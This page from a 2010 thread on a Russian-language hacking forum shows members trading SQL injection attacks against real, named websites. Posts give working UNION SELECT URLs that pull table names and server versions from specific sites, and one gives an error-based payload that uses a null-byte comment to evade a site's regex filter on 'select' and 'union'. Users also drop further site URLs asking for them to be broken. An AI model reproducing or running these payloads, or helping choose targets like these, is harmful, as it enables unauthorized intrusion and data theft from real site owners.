HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15051  
Старый 13.09.2010, 21:37
brutos
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379

Репутация: 0
По умолчанию

Не знаю) Я просто прогнал ссылку через прогу "Havij", она спокойно все обработала. Перехватил запрос, ну и поигрался с ним. Ничего особенного)

Вообще, там даже вот так все работает:

Цитата:
Сообщение от None  
http://polvent.com/index.php?action=catalog&brand=-2+union+ALL+SELECT+1,2,3,4,5,group_concat(table_na me),7,8,9,10,11,12,13+FROM+information_schema.tabl es--
Фильтры стоят на select и from.
 
Ответить с цитированием

  #15052  
Старый 13.09.2010, 21:44
moodoone
Новичок
Регистрация: 21.10.2009
Сообщений: 27
Провел на форуме:
815635

Репутация: 16
Отправить сообщение для moodoone с помощью ICQ
По умолчанию

Код:
Code:
http://www.koruna.ua/index.php?id=2'
А тут можеш мне помочь? Сайт уязвим вобше?

____

Сам вроде разобрался) Спасибо еще раз)
 
Ответить с цитированием

  #15053  
Старый 14.09.2010, 11:06
gabarea
Новичок
Регистрация: 30.03.2010
Сообщений: 2
Провел на форуме:
21162

Репутация: 0
По умолчанию

http://powell.citymedia.ca/deal_framed.php?deal_id=64202
 
Ответить с цитированием

  #15054  
Старый 14.09.2010, 15:34
brutos
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379

Репутация: 0
По умолчанию

Цитата:
Сообщение от gabarea  
gabarea said:
http://powell.citymedia.ca/deal_framed.php?deal_id=64202
http://powell.citymedia.ca/categorydetails.php?cat_id=-186'+union+select+1,@@version_compile_os,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22 ,23,24,25,26,27,28,29,30+--+
 
Ответить с цитированием

  #15055  
Старый 14.09.2010, 20:00
Kappa_87
Guest
Сообщений: n/a
Провел на форуме:
1812

Репутация: 0
По умолчанию

что делать если union и select в связке фильтруются
 
Ответить с цитированием

  #15056  
Старый 14.09.2010, 20:38
gabarea
Новичок
Регистрация: 30.03.2010
Сообщений: 2
Провел на форуме:
21162

Репутация: 0
По умолчанию

http://www.ftv.com/fashion/page.php?P=2803&gid=807&kid=11473&size=full&pid=53 965
 
Ответить с цитированием

  #15057  
Старый 14.09.2010, 21:05
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от gabarea  
gabarea said:
http://www.ftv.com/fashion/page.php?P=2803&gid=807&kid=11473&size=full&pid=53 965
а не пойти бы вам на все 3 буквы? тут что для вас....конвеер по раскрутке скулей для тебя?
 
Ответить с цитированием

  #15058  
Старый 14.09.2010, 21:33
DrakonHaSh
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305

Репутация: 30
Отправить сообщение для DrakonHaSh с помощью ICQ
По умолчанию

Kappa_87

http://www.xxx.ru/showtopic.php?num=-123 or 1 /*%00*/ group by concat(left((select count(*) from INFORMATION_SCHEMA.TABLES),64),rand(0)|0) having min(0)--+

=>

244

в принципе с /*%00*/ и обыкновенный union select скорее всего прокатит (лень и неинтересно уже дальше копать) - у них там некая хрень, похоже самописная, которая все параметры к сайту при любом обращении фильтрует по regexp на что-то в роде select.+from и union.+select c безразличеем к регистру.

кста, запрос и через post проходит
 
Ответить с цитированием

  #15059  
Старый 14.09.2010, 23:58
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

Заметил, что есть категория сайтов, у которых нет "подцепки" для неопытных..

ну скажем сайт крутой, серьезный и куда не переходи - все линки кончаются на *.htm , *.aspx или .html. А в особыйслучаях - без расширением, чисто по разделам: /home/, /photo/ и т.п.

В таких случаях как можно быть ? в концах попробывал сатвить ', 1=1 и т.п. дела, а по просто показывает, что нет такого страницы.

просто я обычно тренировался на т.п. запросах, как это: /*.php?id=***

а тут другая ситуация уже..
 
Ответить с цитированием

  #15060  
Старый 15.09.2010, 00:35
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от B1t.exe  
B1t.exe said:
Заметил, что есть категория сайтов, у которых нет "подцепки" для неопытных..
ну скажем сайт крутой, серьезный и куда не переходи - все линки кончаются на
*.htm
,
*.aspx
или
.html
. А в особыйслучаях - без расширением, чисто по разделам: /home/, /photo/ и т.п.
В таких случаях как можно быть ? в концах попробывал сатвить ', 1=1 и т.п. дела, а по просто показывает, что нет такого страницы.
просто я обычно тренировался на т.п. запросах, как это:
/*.php?id=***
а тут другая ситуация уже..
mod_rewrite тебе о чем нибудь говорит?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
 


Быстрый переход




ANTICHAT.XYZ